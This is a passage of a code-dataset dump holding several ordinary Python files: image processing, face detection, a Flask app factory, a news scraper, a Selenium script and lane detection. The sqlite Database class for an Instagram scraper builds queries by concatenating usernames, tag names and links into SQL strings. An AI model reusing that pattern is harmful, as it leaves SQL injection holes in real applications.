"usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 18, "usage_type": "call"}, {"api_name": "json.load", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.Markup", "line_number": 30, "usage_type": "call"}, {"api_name": "json.load", "line_number": 37, "usage_type": "call"}]}
+{"seq_id": "6727526583", "text": "#!/usr/bin/env python\n# coding: utf-8\n\nimport sys\nimport json\nimport copy\nfrom .compat import PY3, unicode_ as u_\n\n\nif PY3:\n unicode_type = str\n basestring_type = str\nelse:\n # The names unicode and basestring don't exist in py3 so silence flake8.\n unicode_type = unicode # noqa\n basestring_type = basestring # noqa\n\nHTTP_METHODS = ['GET', 'POST', 'PUT', 'DELETE', 'HEAD', 'OPTIONS', 'CONNECT', 'TRACE']\n\n\n_TO_UNICODE_TYPES = (unicode_type, type(None))\n\n\ndef to_unicode(value):\n \"\"\"Converts a string argument to a unicode string.\n\n If the argument is already a unicode string or None, it is returned\n unchanged. Otherwise it must be a byte string and is decoded as utf8.\n \"\"\"\n if isinstance(value, _TO_UNICODE_TYPES):\n return value\n if not isinstance(value, bytes):\n raise TypeError(\n \"Expected bytes, unicode, or None; got %r\" % type(value)\n )\n return value.decode(\"utf-8\")\n\n\ndef _copy_dict(x, memo):\n y = {}\n memo[id(x)] = y\n for key, value in x.items():\n y[key] = unicode_copy(value, memo)\n return y\n\n\ndef _copy_list(x, memo):\n y = []\n memo[id(x)] = y\n for a in x:\n y.append(unicode_copy(a, memo))\n return y\n\n\ndef unicode_copy(x, memo=None, _nil=[]):\n if memo is None:\n memo = {}\n\n d = id(x)\n y = memo.get(d, _nil)\n if y is not _nil:\n return y\n\n if isinstance(x, dict):\n y = _copy_dict(x, memo)\n elif isinstance(x, list):\n y = _copy_list(x, memo)\n elif isinstance(x, str):\n y = to_unicode(x)\n else:\n y = x\n\n memo[d] = y\n copy._keep_alive(x, memo) # Make sure x lives at least as long as d\n return y\n\n\ndef json_decode(value):\n \"\"\"Returns Python objects for the given JSON string.\"\"\"\n return json.loads(value)\n\n\ndef is_empty_string(v):\n if v == '' or v == u_(''):\n return True\n return False\n", "repo_name": "reorx/params", "sub_path": "params/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1895, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "compat.PY3", "line_number": 10, "usage_type": "name"}, {"api_name": "copy._keep_alive", "line_number": 74, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 80, "usage_type": "call"}, {"api_name": "compat.unicode_", "line_number": 84, "usage_type": "call"}]}
+{"seq_id": "42981832115", "text": "from functools import cmp_to_key\nfrom Point import Point\n\nclass EventQueue:\n def __init__(self, segments, sweep_line, debug):\n self.sweep_line = sweep_line\n self.points = []\n if debug == None:\n debug = False\n self.debug = debug\n for seg in segments:\n if seg.start.compare(seg.end) > 0:\n temp = seg.start\n seg.start = seg.end\n seg.start.is_start = True\n seg.start.is_end = False\n seg.end = temp\n seg.end.is_start = False\n seg.end.is_end = True\n # print(\"reverted:\" + seg.start.print() + \"; \" + seg.end.print())\n self.points.append(seg.start)\n self.points.append(seg.end)\n if self.debug:\n print(\"In:\" + seg.start.print() + \"; \" + seg.end.print())\n self.points.sort(key=cmp_to_key(Point.compare))\n if self.debug:\n print(\"Points: \\n\", '\\n '.join(\"%s\" % (item.print()) for item in self.points))\n\n def has_intersections(self):\n if len(self.points) < 2:\n return False\n for point in self.points:\n intersects = self.sweep_line.move(point)\n if self.debug:\n print(point.print(), \" has intersections:\", intersects)\n if intersects:\n return True\n return False\n\n", "repo_name": "cyberskeleton/simple-polygon-recognition-shamos-hoey", "sub_path": "EventQueue.py", "file_name": "EventQueue.py", "file_ext": "py", "file_size_in_byte": 1398, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "functools.cmp_to_key", "line_number": 25, "usage_type": "call"}, {"api_name": "Point.Point.compare", "line_number": 25, "usage_type": "attribute"}, {"api_name": "Point.Point", "line_number": 25, "usage_type": "name"}]}
+{"seq_id": "31462846007", "text": "# https://cooluks.tistory.com/187\r\n# https://github.com/opencv/opencv/tree/master/data/haarcascades\r\n# 얼굴 영역 검출 및 영역 표시하기\r\n\r\nfrom PIL import Image\r\nimport cv2\r\n\r\nimport cv2\r\nimport sys\r\n \r\ncascade_file = \"haarcascade_frontalface_default.xml\"\r\ncascade = cv2.CascadeClassifier(cv2.data.haarcascades + cascade_file)\r\n \r\nimage_file = \"20220805_133250.jpg\" # ./data/face2.jpg\r\nimage = cv2.imread(image_file)\r\nimage_gs = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n \r\nface_list = cascade.detectMultiScale(image_gs, scaleFactor=1.1,\r\n minNeighbors=1, minSize=(150, 150))\r\nif len(face_list) > 0:\r\n print(face_list)\r\n color = (0, 0, 255)\r\n for face in face_list:\r\n x, y, w, h = face\r\n cv2.rectangle(image, (x, y), (x+w, y+h), color, thickness=8)\r\n cv2.imwrite(\"facedetect-output.PNG\", image)\r\nelse:\r\n print(\"no face\")\r\n\r\n# cv_im = cv2.imread('gani.jpg', 0)\r\n# print(\"img.shape = {0}\".format(cv_im.shape))\r\n\r\n# cv2.imshow('cv_im', cv_im)\r\n# cv2.waitKey(0)\r\n# cv2.destroyAllWindows()", "repo_name": "GongAnts/GongAnts_Untact_Study_Room", "sub_path": "ml/v0.1_220627_detection_output.py", "file_name": "v0.1_220627_detection_output.py", "file_ext": "py", "file_size_in_byte": 1062, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.data", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "24754419016", "text": "import image_tweaker\nimport cv2, eel, wx, os, shutil\n\nimages_count = 0\n\ntweaker = image_tweaker.ImageTweaker() # defining an object of ImageTweaker() class\nfile_name = str() # will be treated as global variable to have the chosen image name saved.\nfile_original_path = str() # will be treated as global variable to have the image original path saved.\nto_redo_list = list() # list for popped images of tweaker.image_states when undo\n\n\ndef get_second_image(wildcard=\"*\"):\n \"\"\"Displaying Dialog for user to select image\"\"\"\n app = wx.App(None)\n style = wx.FD_OPEN | wx.FD_FILE_MUST_EXIST\n dialog = wx.FileDialog(None, 'Open', wildcard=wildcard, style=style) # configuring how dialog displays and looks\n if dialog.ShowModal() == wx.ID_OK: # displaying the dialog when user clicks\n global file_original_path # considering file_original_path variable here as global\n file_original_path = dialog.GetPath() # saving the selected file path\n global file_name # considering file_original variable here as global\n file_name = dialog.GetFilename() # saving the name of the selected file\n shutil.copyfile(file_original_path, f\"{os.path.dirname(os.path.realpath(__file__))}/web/images/{file_name}\")\n # copying the file from its path, to project_directory_path/web/images/directory\n image_path = f\"web/images/{file_name}\" # saving image_path especially to this current python file 'image_launcher'\n tweaker.set_image_conf(image_path) # setting ImageTweaker configurations\n return image_path # returning file_name to javascript as to be the path to look for the images using html img tag\n else:\n return None\n dialog.Destroy() # finally, close the dialog\n\n", "repo_name": "py-sponser/Desktop-App-Projects", "sub_path": "Image Processing Toolbox/double_image_launcher.py", "file_name": "double_image_launcher.py", "file_ext": "py", "file_size_in_byte": 1741, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "image_tweaker.ImageTweaker", "line_number": 6, "usage_type": "call"}, {"api_name": "wx.App", "line_number": 14, "usage_type": "call"}, {"api_name": "wx.FD_OPEN", "line_number": 15, "usage_type": "attribute"}, {"api_name": "wx.FD_FILE_MUST_EXIST", "line_number": 15, "usage_type": "attribute"}, {"api_name": "wx.FileDialog", "line_number": 16, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 17, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "6453617331", "text": "\"\"\"Initialise Flask application.\"\"\"\nimport html\nimport os\nimport re\n\nimport flask_reverse_proxy\nfrom flask import Flask, g, request, url_for\nfrom flask_babel import Babel\nfrom flask_compress import Compress\nfrom pylibmc import Client, ClientPool\n\n\ndef create_app():\n \"\"\"Instanciate app.\"\"\"\n app = Flask(__name__)\n\n if os.path.exists(app.config.root_path + '/config.cfg') is False:\n print(\"copy config.default.cfg to config.cfg and add your settings\")\n app.config.from_pyfile(app.config.root_path + '/config.default.cfg')\n else:\n app.config.from_pyfile(app.config.root_path + '/config.cfg')\n\n babel = Babel(app)\n Compress(app)\n\n @babel.localeselector\n def get_locale():\n \"\"\"Get correct language from url.\"\"\"\n locale = request.path[1:].split('/', 1)[0]\n if locale in ['sv', 'en']:\n return locale\n else:\n locale = 'sv'\n for lang in list(request.accept_languages.values()):\n if lang[:2] in ['sv', 'en']:\n locale = lang[:2]\n break\n\n g.locale = locale\n return locale\n\n client = Client(app.config['MEMCACHED'])\n\n @app.before_request\n def func():\n g.babel = Babel\n g.language = get_locale()\n g.config = app.config\n g.mc_pool = ClientPool(client, app.config['POOL_SIZE'])\n\n @app.context_processor\n def inject_custom():\n d = {'lurl_for': lambda ep,\n **kwargs: url_for(ep + '_' + g.language, **kwargs)}\n return d\n\n @app.template_filter('deescape')\n def deescape_filter(s):\n return html.unescape(s)\n\n @app.template_filter('cclink')\n def cclink_filter(s):\n return re.sub(r'(CC-BY\\S*)', '\\\\1 ', s)\n\n from . import helpers\n\n app.jinja_env.globals.update(get_life_range=helpers.get_life_range)\n app.jinja_env.globals.update(make_namelist=helpers.make_namelist)\n app.jinja_env.globals.update(make_datelist=helpers.make_datelist)\n app.jinja_env.globals.update(make_simplenamelist=helpers.make_simplenamelist)\n app.jinja_env.globals.update(make_placelist=helpers.make_placelist)\n app.jinja_env.globals.update(make_placenames=helpers.make_placenames)\n app.jinja_env.globals.update(\n make_alphabetical_bucket=helpers.make_alphabetical_bucket)\n app.jinja_env.globals.update(get_date=helpers.get_date)\n app.jinja_env.globals.update(join_name=helpers.join_name)\n app.jinja_env.globals.update(swedish_translator=helpers.swedish_translator)\n app.jinja_env.globals.update(sorted=sorted)\n app.jinja_env.globals.update(len=len)\n app.jinja_env.globals.update(get_lang_text=helpers.get_lang_text)\n app.jinja_env.globals.update(get_shorttext=helpers.get_shorttext)\n app.jinja_env.globals.update(get_org_name=helpers.get_org_name)\n app.jinja_env.globals.update(rewrite_von=helpers.rewrite_von)\n app.jinja_env.globals.update(lowersorted=helpers.lowersorted)\n app.jinja_env.globals.update(get_current_date=helpers.get_current_date)\n app.jinja_env.globals.update(karp_fe_url=helpers.karp_fe_url)\n\n from . 
import views\n app.register_blueprint(views.bp)\n app.register_error_handler(Exception, views.page_not_found)\n\n app.wsgi_app = flask_reverse_proxy.ReverseProxied(app.wsgi_app)\n return app\n\n\n# if __name__ == '__main__':\n# if sys.version_info.major < 3:\n# reload(sys)\n# sys.setdefaultencoding('utf8')\n# app.run()\n", "repo_name": "spraakbanken/skbl-portal", "sub_path": "skbl/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 3523, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask_babel.Babel", "line_number": 23, "usage_type": "call"}, {"api_name": "flask_compress.Compress", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.request.accept_languages.values", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.accept_languages", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.g.locale", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 39, "usage_type": "name"}, {"api_name": "pylibmc.Client", "line_number": 42, "usage_type": "call"}, {"api_name": "flask.g.babel", "line_number": 46, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 46, "usage_type": "name"}, {"api_name": "flask_babel.Babel", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.g.language", "line_number": 47, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.g.config", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 48, "usage_type": "name"}, {"api_name": "flask.g.mc_pool", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 49, "usage_type": "name"}, {"api_name": "pylibmc.ClientPool", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.g.language", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.g", "line_number": 54, "usage_type": "name"}, {"api_name": "html.unescape", "line_number": 59, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 63, "usage_type": "call"}, {"api_name": "flask_reverse_proxy.ReverseProxied", "line_number": 92, "usage_type": "call"}]}
+{"seq_id": "19852370144", "text": "# web scrapper along with meta data generation in data.json file\n\nfrom newsplease import NewsPlease\nimport bs4\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport json\n\n\n\ndef main():\n articles = []\n arti = []\n data = []\n \n #fetching articles url\n my_url = 'https://www.elpais.com.co/'\n open_url = urlopen(my_url)\n\n html = open_url.read()\n open_url.close()\n\n page_soup = BeautifulSoup(html,\"html.parser\")\n\n titles = page_soup.findAll(\"h2\",{\"class\":\"title\"})\n paid_title = page_soup.find(\"div\",{\"class\":\"container-full zd\"})\n paid_url = paid_title.findAll(\"h2\",{\"class\":\"title\"})\n\n for y in paid_url:\n if(y.a['href'].startswith('https://')):\n arti.append(y.a['href'])\n else:\n arti.append(\"https://www.elpais.com.co\" + y.a['href'])\n\n for x in titles:\n if(x.find(\"a\",{\"class\":\"page-link\"})):\n url = x.a['href']\n if(url.startswith('https://')):\n articles.append(url)\n else:\n articles.append(\"https://www.elpais.com.co\" + url)\n\n for p in arti:\n articles.remove(p)\n\n #creating meta data and storing it in data.json\n for post in articles:\n article = NewsPlease.from_url(post)\n data_json = {\n \"URL\": article.url,\n \"Domain\": article.source_domain,\n \"title\": article.title,\n \"author\": str(article.authors),\n \"text\": str(article.text),\n \"date_published\": str(article.date_publish)\n }\n data.append(data_json)\n \n with open('data.json', 'w') as outfile:\n json.dump(data, outfile)\n \n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "saurabhkumar2015/large-scale-spanish-news-nlp", "sub_path": "Crawler/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 1708, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "urllib.request.urlopen", "line_number": 18, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 23, "usage_type": "call"}, {"api_name": "newsplease.NewsPlease.from_url", "line_number": 48, "usage_type": "call"}, {"api_name": "newsplease.NewsPlease", "line_number": 48, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 60, "usage_type": "call"}]}
+{"seq_id": "30445027844", "text": "import sqlite3\nimport logging\nimport uuid\n\nfrom . import constants\n\nlogger = logging.getLogger('__name__')\n\n\nclass Database:\n\n def __init__(self):\n self.__connection = sqlite3.connect(constants.LOCAL_DB)\n self.__connection.execute(\"PRAGMA foreign_keys = 1\")\n\n def create_tables(self):\n cursor = self.__connection.cursor()\n\n try:\n cursor.execute(\"CREATE TABLE IF NOT EXISTS user (id INTEGER PRIMARY KEY UNIQUE, username TEXT);\")\n\n cursor.execute(\"CREATE TABLE IF NOT EXISTS tag \" +\n \"(id TEXT PRIMARY KEY UNIQUE, tagname TEXT UNIQUE);\")\n\n cursor.execute(\"CREATE TABLE IF NOT EXISTS post \" +\n \"(id TEXT PRIMARY KEY UNIQUE, link TEXT, has_multiple_content INTEGER, \" +\n \"user_id INTEGER, \" +\n \"FOREIGN KEY(user_id) REFERENCES user(id) ON DELETE SET NULL );\")\n\n cursor.execute(\"CREATE TABLE IF NOT EXISTS tag_post \" +\n \"(tag_id TEXT, post_id TEXT, in_top TEXT, in_recent INTEGER, \" +\n \"FOREIGN KEY(tag_id) REFERENCES tag(id) ON DELETE CASCADE, \" +\n \"FOREIGN KEY(post_id) REFERENCES post(id) ON DELETE CASCADE, \" +\n \"PRIMARY KEY(tag_id, post_id) );\")\n\n except sqlite3.Error as err:\n logger.error(err)\n print('SQL error at creating tables.')\n finally:\n cursor.close()\n\n def __execute_query_and_commit(self, query, dict_values=None):\n if dict_values is None:\n dict_values = {}\n\n cursor = self.__connection.cursor()\n try:\n cursor.execute(query, dict_values)\n except sqlite3.Error as err:\n logger.error('error at executing query: %s' % query)\n logger.error('error: %s' % err)\n finally:\n self.__connection.commit()\n cursor.close()\n\n def __execute_query_and_fetch(self, query):\n cursor = self.__connection.cursor()\n\n try:\n cursor.execute(query)\n except sqlite3.Error as err:\n logger.error('error at executing query: %s' % query)\n logger.error('error: %s' % err)\n finally:\n data = cursor.fetchall()\n cursor.close()\n return data\n\n def insert_tag(self, tag):\n query = \"INSERT OR IGNORE INTO tag VALUES (:id, :tagname);\"\n values = {'id': str(uuid.uuid4()), 'tagname': tag}\n self.__execute_query_and_commit(query, values)\n\n def insert_tag_post(self, link, tag, in_top=False, in_recent=False):\n query = \"INSERT OR IGNORE INTO tag_post VALUES (:tag_id, :post_id, :in_top, :in_recent);\"\n post_id = self.__get_post_id(link)\n tag_id = self.__get_tag_id(tag)\n values = {'tag_id': tag_id, 'post_id': post_id, 'in_top': in_top, 'in_recent': in_recent}\n self.__execute_query_and_commit(query, values)\n\n def insert_userid_and_username(self, userid, username):\n query = \"INSERT OR IGNORE INTO user(id, username) VALUES (:id, :username);\"\n values = {'id': userid, 'username': username}\n self.__execute_query_and_commit(query, values)\n\n def insert_post(self, link, has_multiple_content, userid=None):\n post_id = self.__get_post_id(link)\n\n if all(v is not None for v in [post_id, userid]):\n query = \"UPDATE post SET user_id =\" + userid + \" WHERE id ='\" + post_id + \"';\"\n self.__execute_query_and_commit(query)\n elif not post_id:\n query = \"INSERT INTO post VALUES (:id, :link, :has_multiple_content, :user_id);\"\n values = {'id': str(uuid.uuid4()), 'link': link, 'has_multiple_content': has_multiple_content,\n 'user_id': userid}\n self.__execute_query_and_commit(query, values)\n\n def retrieve_all_usernames(self):\n query = \"SELECT username FROM user ORDER BY username ASC;\"\n data = self.__execute_query_and_fetch(query)\n\n usernames = []\n for username in data:\n usernames.append(username[0])\n return 
sorted(usernames)\n\n def retrieve_all_tags(self):\n query = \"SELECT tagname FROM tag ORDER BY tagname ASC;\"\n data = self.__execute_query_and_fetch(query)\n\n tags = []\n for username in data:\n tags.append(username[0])\n return sorted(tags)\n\n def __get_post_id(self, link):\n query = \"SELECT id FROM post WHERE link ='\" + link + \"';\"\n data = self.__execute_query_and_fetch(query)\n\n if len(data) > 0:\n return data[0][0]\n return None\n\n def __get_tag_id(self, tagname):\n query = \"SELECT id FROM tag WHERE tagname ='\" + tagname + \"';\"\n data = self.__execute_query_and_fetch(query)\n\n if len(data) > 0:\n return data[0][0]\n return None\n\n def get_username_by_id(self, user_id):\n query = \"SELECT username FROM user WHERE id =\" + str(user_id) + \";\"\n data = self.__execute_query_and_fetch(query)\n\n if len(data) > 0:\n return data[0][0]\n return None\n\n def get_user_post_links(self, userid):\n query = \"SELECT link FROM post WHERE user_id='\" + userid + \"';\"\n data = self.__execute_query_and_fetch(query)\n\n post_links = []\n for row in data:\n post_links.append(row[0])\n return post_links\n\n def user_post_link_exists(self, username, link):\n query = \"SELECT EXISTS (SELECT 1 FROM post WHERE link ='\" + link + \"' AND user_id=(SELECT id FROM user WHERE\" \\\n + \" username='\" + username + \"') LIMIT 1);\"\n data = self.__execute_query_and_fetch(query)\n result = data[0][0]\n\n if result == 1:\n return True\n return False\n\n def user_exists(self, username):\n query = \"SELECT EXISTS( SELECT 1 FROM user WHERE username='\" + username + \"' LIMIT 1);\"\n data = self.__execute_query_and_fetch(query)\n result = data[0][0]\n\n if result == 1:\n return True\n return False\n\n def tag_exists(self, tagname):\n query = \"SELECT EXISTS( SELECT 1 FROM tag WHERE tagname='\" + tagname + \"' LIMIT 1);\"\n data = self.__execute_query_and_fetch(query)\n result = data[0][0]\n\n if result == 1:\n return True\n return False\n\n def get_id_by_username(self, username):\n query = \"SELECT id FROM user WHERE username ='\" + username + \"';\"\n data = self.__execute_query_and_fetch(query)\n\n if len(data) > 0:\n return data[0][0]\n return None\n\n def get_user_post_count(self, username):\n query = \"SELECT COUNT(*) FROM post WHERE user_id =(SELECT id FROM user WHERE username ='\" \\\n + username + \"');\"\n data = self.__execute_query_and_fetch(query)\n post_count = data[0][0]\n return post_count\n\n def get_top_tag_post_count(self, tag):\n tag_id = self.__get_tag_id(tag)\n query = \"SELECT COUNT(*) FROM tag_post WHERE tag_id ='\" + tag_id + \"' AND in_top=1;\"\n data = self.__execute_query_and_fetch(query)\n post_count = data[0][0]\n return post_count\n\n def get_recent_tag_post_count(self, tag):\n tag_id = self.__get_tag_id(tag)\n query = \"SELECT COUNT(*) FROM tag_post WHERE tag_id ='\" + tag_id + \"' AND in_recent=1;\"\n data = self.__execute_query_and_fetch(query)\n post_count = data[0][0]\n return post_count\n\n def rename_user(self, user_id, new_username):\n query = \"UPDATE user SET username ='\" + new_username + \"' WHERE id =\" + str(user_id) + \";\"\n self.__execute_query_and_commit(query)\n\n def remove_user(self, username):\n query = \"SELECT username FROM user WHERE username='\" + username + \"';\"\n data = self.__execute_query_and_fetch(query)\n\n if len(data) > 0:\n query = \"DELETE FROM user WHERE username = (:username);\"\n values = {'username': username}\n self.__execute_query_and_commit(query, values)\n self.remove_unused_posts()\n\n def remove_all_users(self):\n query = 
\"DELETE FROM user\"\n self.__execute_query_and_commit(query)\n self.remove_unused_posts()\n\n def remove_tag(self, tag):\n query = \"SELECT tagname FROM tag WHERE tagname='\" + tag + \"';\"\n data = self.__execute_query_and_fetch(query)\n\n if len(data) > 0:\n query = \"DELETE FROM tag WHERE tagname = (:tagname);\"\n values = {'tagname': tag}\n self.__execute_query_and_commit(query, values)\n self.remove_unused_posts()\n\n def remove_all_tags(self):\n query = \"DELETE FROM tag\"\n self.__execute_query_and_commit(query)\n\n query = \"DELETE FROM tag_post\"\n self.__execute_query_and_commit(query)\n\n self.remove_unused_posts()\n\n def remove_unused_posts(self):\n query = \"DELETE FROM post WHERE user_id is NULL and id NOT IN (SELECT post_id FROM tag_post)\"\n self.__execute_query_and_commit(query)\n\n def close_connection(self):\n self.__connection.close()\n", "repo_name": "zaironjacobs/instagram-scraper", "sub_path": "instagram_scraper/database.py", "file_name": "database.py", "file_ext": "py", "file_size_in_byte": 9123, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 13, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 36, "usage_type": "attribute"}, {"api_name": "sqlite3.Error", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sqlite3.Error", "line_number": 61, "usage_type": "attribute"}, {"api_name": "uuid.uuid4", "line_number": 71, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 94, "usage_type": "call"}]}
+{"seq_id": "37097478636", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\ndriver = webdriver.Firefox()\ndriver.get(\"http://www.uol.com.br\")\n\ndriver.find_element_by_xpath(\"/html/body/header/div[2]/div/div[3]/div/div/input\").click()\n\nelement = WebDriverWait(driver, 10).until(\n EC.visibility_of_element_located((By.ID, \"searchForm\"))\n)\n\nform = driver.find_element_by_id(\"searchForm\")\nelem = form.find_element_by_name(\"q\")\nelem.clear()\nelem.send_keys(\"a vida\")\nelem.send_keys(Keys.RETURN)\n\nelement = WebDriverWait(driver, 15).until(\n EC.presence_of_element_located((By.CLASS_NAME, \"gs-webResult\"))\n)\n\nresultados = driver.find_elements_by_css_selector(\".gs-webResult\")\n\nfor item in resultados:\n titulo = item.find_element_by_css_selector(\".gs-title\").text\n print(titulo)", "repo_name": "LuisaBarbalho/pokeapi", "sub_path": "selenium_uol.py", "file_name": "selenium_uol.py", "file_ext": "py", "file_size_in_byte": 948, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "selenium.webdriver.Firefox", "line_number": 7, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 7, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 12, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.visibility_of_element_located", "line_number": 13, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 13, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 13, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.RETURN", "line_number": 20, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 22, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 23, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 23, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 23, "usage_type": "name"}]}
+{"seq_id": "3888473773", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom audioop import reverse\nimport numpy as np\nimport cv2, random, math, copy\n\nimport pandas as pd\nline_temp = [[],[]]\n\nWidth = 640\nHeight = 480\n\ncap = cv2.VideoCapture(\"../subProject.avi\")\nwindow_title = 'camera'\n\nwarp_img_w = 320\nwarp_img_h = 240\n\nwarpx_margin = 45\nwarpy_margin = 3\n\nnwindows = 20\nmargin = 25\nminpix = 5\n\nlane_bin_th = 5\n\nwarp_src = np.array([\n [100,340], \n [0,413],\n [540,340],\n [640,413]\n], dtype=np.float32)\n\nwarp_dist = np.array([\n [0,0],\n [0,warp_img_h],\n [warp_img_w,0],\n [warp_img_w, warp_img_h]\n], dtype=np.float32)\n\ncalibrated = True\nif calibrated:\n mtx = np.array([\n [422.037858, 0.0, 245.895397], \n [0.0, 435.589734, 163.625535], \n [0.0, 0.0, 1.0]\n ])\n dist = np.array([-0.289296, 0.061035, 0.001786, 0.015238, 0.0])\n cal_mtx, cal_roi = cv2.getOptimalNewCameraMatrix(mtx, dist, (Width, Height), 1, (Width, Height))\n\ndef calibrate_image(frame):\n global Width, Height\n global mtx, dist\n global cal_mtx, cal_roi\n \n tf_image = cv2.undistort(frame, mtx, dist, None, cal_mtx)\n x, y, w, h = cal_roi\n tf_image = tf_image[y:y+h, x:x+w]\n\n return cv2.resize(tf_image, (Width, Height))\n\n\ndef warp_image(img, src, dst, size):\n M = cv2.getPerspectiveTransform(src, dst)\n Minv = cv2.getPerspectiveTransform(dst, src)\n warp_img = cv2.warpPerspective(img, M, size, flags=cv2.INTER_LINEAR)\n return warp_img, M, Minv\n\npre_rightx_current = 320\npre_leftx_current = 0\npre_rightx_current = 320\npre_leftx_current = 0\nmidpoint = 320\n\n\ndef warp_process_image(img):\n global nwindows\n global margin\n global minpix\n global lane_bin_th\n global line_temp\n global pre_rightx_current\n global pre_leftx_current\n global rightx_current\n global leftx_current\n global midpoint\n\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n m = cv2.mean(gray)[0]\n\n dst = cv2.add(gray ,(40 - m))\n\n blur_gray = cv2.GaussianBlur(dst,(5, 5), 3)\n\n\n cv2.circle(blur_gray, (158, 265),60, 255, -1) \n \n \n\n _, reverse = cv2.threshold(blur_gray, lane_bin_th, 255, cv2.THRESH_BINARY)\n lane = 255 - reverse\n\n\n histogram = np.sum(lane[195:205,:], axis=0) \n \n midpoint = int((pre_rightx_current+pre_leftx_current)/2)\n\n\n hist_threshold = 500\n\n if max(histogram[:midpoint]) < hist_threshold:\n leftx_current = 0 \n else:\n leftx_current = np.argmax(histogram[:midpoint])\n\n if max(histogram[midpoint:]) < hist_threshold:\n rightx_current = 320\n else:\n rightx_current = np.argmax(histogram[midpoint:]) + midpoint\n\n \n\n pre_rightx_current = rightx_current\n pre_leftx_current = leftx_current\n\n window_height = np.int(lane.shape[0]/nwindows)\n nz = lane.nonzero()\n\n left_lane_inds = []\n 